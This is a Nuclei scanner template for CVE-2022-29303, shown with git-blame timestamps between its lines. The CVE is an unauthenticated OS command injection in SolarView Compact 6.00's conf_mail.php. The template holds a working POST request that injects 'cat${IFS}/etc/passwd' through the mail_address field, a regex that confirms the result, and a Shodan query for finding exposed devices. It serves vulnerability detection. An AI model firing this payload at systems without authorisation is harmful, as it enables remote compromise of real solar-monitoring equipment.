2022-05-18 10:39:07 +00:00
|
|
|
id: CVE-2022-29303
|
|
|
|
|
|
|
|
info:
|
2022-06-03 19:12:31 +00:00
|
|
|
name: SolarView Compact 6.00 - OS Command Injection
|
2022-05-18 13:57:46 +00:00
|
|
|
author: badboycxcc
|
2022-05-22 11:47:39 +00:00
|
|
|
severity: critical
|
2022-05-18 14:11:23 +00:00
|
|
|
description: |
|
2022-06-03 19:12:31 +00:00
|
|
|
SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php.
|
2023-09-06 11:59:08 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00.
|
2022-05-18 10:39:07 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/50940
|
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303
|
2022-05-18 14:11:23 +00:00
|
|
|
- https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing
|
2023-04-12 10:55:48 +00:00
|
|
|
- http://packetstormsecurity.com/files/167183/SolarView-Compact-6.0-Command-Injection.html
|
2022-05-20 21:38:52 +00:00
|
|
|
classification:
|
2022-05-22 11:47:39 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
2022-05-20 21:38:52 +00:00
|
|
|
cve-id: CVE-2022-29303
|
2023-08-31 11:46:18 +00:00
|
|
|
cwe-id: CWE-78
|
2023-10-23 12:22:20 +00:00
|
|
|
epss-score: 0.9555
|
2023-11-20 10:15:32 +00:00
|
|
|
epss-percentile: 0.99213
|
2023-09-06 11:59:08 +00:00
|
|
|
cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:*
|
2022-05-18 10:39:07 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 11:59:08 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: contec
|
|
|
|
product: sv-cpt-mc310_firmware
|
2023-09-06 11:59:08 +00:00
|
|
|
shodan-query: http.html:"SolarView Compact"
|
2023-07-15 16:29:17 +00:00
|
|
|
tags: injection,solarview,edb,packetstorm,cve,cve2022,rce,kev
|
2022-05-18 10:39:07 +00:00
|
|
|
variables:
|
|
|
|
cmd: "cat${IFS}/etc/passwd"
|
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-05-18 10:39:07 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
2022-07-21 08:25:18 +00:00
|
|
|
@timeout: 25s
|
2022-05-18 10:39:07 +00:00
|
|
|
POST /conf_mail.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
2022-05-18 10:40:44 +00:00
|
|
|
|
2022-05-18 10:39:07 +00:00
|
|
|
mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
part: body
|
|
|
|
regex:
|
|
|
|
- "root:.*:0:0"
|
2023-11-21 02:28:48 +00:00
|
|
|
# digest: 4b0a00483046022100b1e4522b1d75ecf2c4eaac937442686fc3078c19e3ae47ee15ad9cbd4449e7ad022100be7a09e066be54877c9e70d827445babe5f15eefd6157ed498586e538f99b508:922c64590222798bb761d5b6d8e72950
|